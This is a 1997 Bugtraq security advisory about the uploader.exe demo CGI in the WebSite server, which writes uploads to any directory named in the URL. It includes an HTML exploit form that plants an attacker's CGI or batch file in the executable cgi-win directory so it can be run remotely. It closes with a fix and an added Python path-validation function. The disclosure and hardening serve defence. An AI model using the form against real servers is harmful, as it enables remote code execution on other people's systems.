Bugtraq mailing list archives
[Alert] Website's uploader.exe (from demo) vulnerable
From: aleph1 () DFW NET (Aleph One)
Date: Thu, 4 Sep 1997 16:59:12 -0500
---------- Forwarded message ----------
Date: Thu, 4 Sep 1997 21:38:57 +0200
From: Herman de Vette <herman () INFO NL>
To: NTBUGTRAQ () NTADVICE COM
Subject: [Alert] Website's uploader.exe (from demo) vulnerable

Check out what I found today (hope it's not a known bug yet).

O'Reilly's webserver 'WebSite' contains a demo package that contains the CGI program uploader.exe. The following HTML page was included with it:

----------------------------------------
<HTML><HEAD><TITLE>Upload a File</TITLE></HEAD>
<BODY>
<H1>Upload a file</H1>
<hr>
<h2>NOTE: Your browser must support file uploading.</H2>
<FORM ENCTYPE="multipart/form-data" METHOD=POST ACTION="/cgi-win/uploader.exe/Uploads/">
<PRE>Your name: <INPUT TYPE=TEXT SIZE=20 NAME="name"> (required)
Email address: <INPUT TYPE=TEXT SIZE=20 NAME="email"> (required)
<b>NOTE:</b> If you don't see a "browse" button below, your browser doesn't support form-based file uploading. Netscape 2.0 and later have this support.
File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40>
File description: <INPUT TYPE=TEXT SIZE=40 NAME="desc"> (required)
<INPUT TYPE=SUBMIT VALUE="Upload Now"></PRE>
</FORM>
<HR>
<A HREF="mailto:..."> <address>...</address> </A></BODY></HTML>
-----------------------------------------

The program uploader.exe doesn't check anything at all. If you're lucky you're running Windows NT and have put only "read/execute access" on cgi-win and other executable paths. Otherwise (Win95) you have a real problem.
You could create a CGI program, then change the HTML file a little, like this:

-----------------------------------------
<HTML><HEAD><TITLE>Upload Any File Anywhere</TITLE></HEAD>
<BODY>
<FORM ENCTYPE="multipart/form-data" METHOD=POST ACTION="http://host.of.vulnerable.website/cgi-win/uploader.exe/cgi-win/">
<INPUT TYPE=HIDDEN NAME="name" VALUE="Foo">
<INPUT TYPE=HIDDEN NAME="email" VALUE="Foo () bar com">
File to upload: <INPUT TYPE=FILE NAME="upl-file" SIZE=40>
<INPUT TYPE=TEXT SIZE=40 NAME="desc" VALUE="YouGottaSecurityProblem">
<INPUT TYPE=SUBMIT VALUE="Upload Now">
</FORM>
</BODY></HTML>
------------------------------------------

Open the HTML file in your browser, select a nice CGI file to upload, and run that CGI program remotely. (No need to tell you what this CGI program could do; it could be a .bat file too, in one of WebSite's other CGI directories.)

SOLUTION: remove uploader.exe, delete it, empty your trash bin and use FTP for file upload.

Herman de Vette
herman () info nl
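The defect the alert describes is that the directory following uploader.exe in the URL (the CGI PATH_INFO) is used verbatim as the write destination, so pointing it at cgi-win turns a file upload into remote execution. The function below is an added illustration, not code from the original post or from the WebSite product, of the checks such an uploader needs: it normalises the requested directory, pins it to a single upload root, and refuses file types the server would execute. The upload root, the suffix list and the Windows filename rules are assumptions of this example.

```python
import posixpath
from pathlib import PurePosixPath

# Constructed policy for a hardened uploader: exactly one writable
# directory, and no file types the web server would execute.
ALLOWED_UPLOAD_ROOT = "/Uploads"
EXECUTABLE_SUFFIXES = {".exe", ".bat", ".cmd", ".com", ".dll", ".pl"}


def resolve_upload_target(path_info: str, filename: str):
    """Return (ok, reason, target).

    path_info is the URL part after uploader.exe, which the demo program
    used as the destination directory without any check. Here it must
    normalise to a path under ALLOWED_UPLOAD_ROOT, and the client-supplied
    filename must be a plain, non-executable name.
    """
    # Collapse '.', '..', backslashes and doubled slashes before comparing,
    # so "/Uploads/../cgi-win/" cannot escape the upload root.
    directory = posixpath.normpath("/" + path_info.replace("\\", "/").lstrip("/"))
    if directory != ALLOWED_UPLOAD_ROOT and not directory.startswith(ALLOWED_UPLOAD_ROOT + "/"):
        return False, "destination outside upload root", directory

    # Browsers may send a full local path; keep only the final component.
    base = PurePosixPath(filename.replace("\\", "/")).name
    if not base or base in (".", ".."):
        return False, "empty or invalid filename", directory
    # Win32 silently strips trailing dots/spaces and treats ':' as an
    # alternate data stream, so such names would not be stored as checked.
    if base != base.rstrip(". ") or ":" in base:
        return False, "filename would be rewritten by the filesystem", directory
    if PurePosixPath(base).suffix.lower() in EXECUTABLE_SUFFIXES:
        return False, "executable file type rejected", directory

    return True, "ok", posixpath.join(directory, base)
```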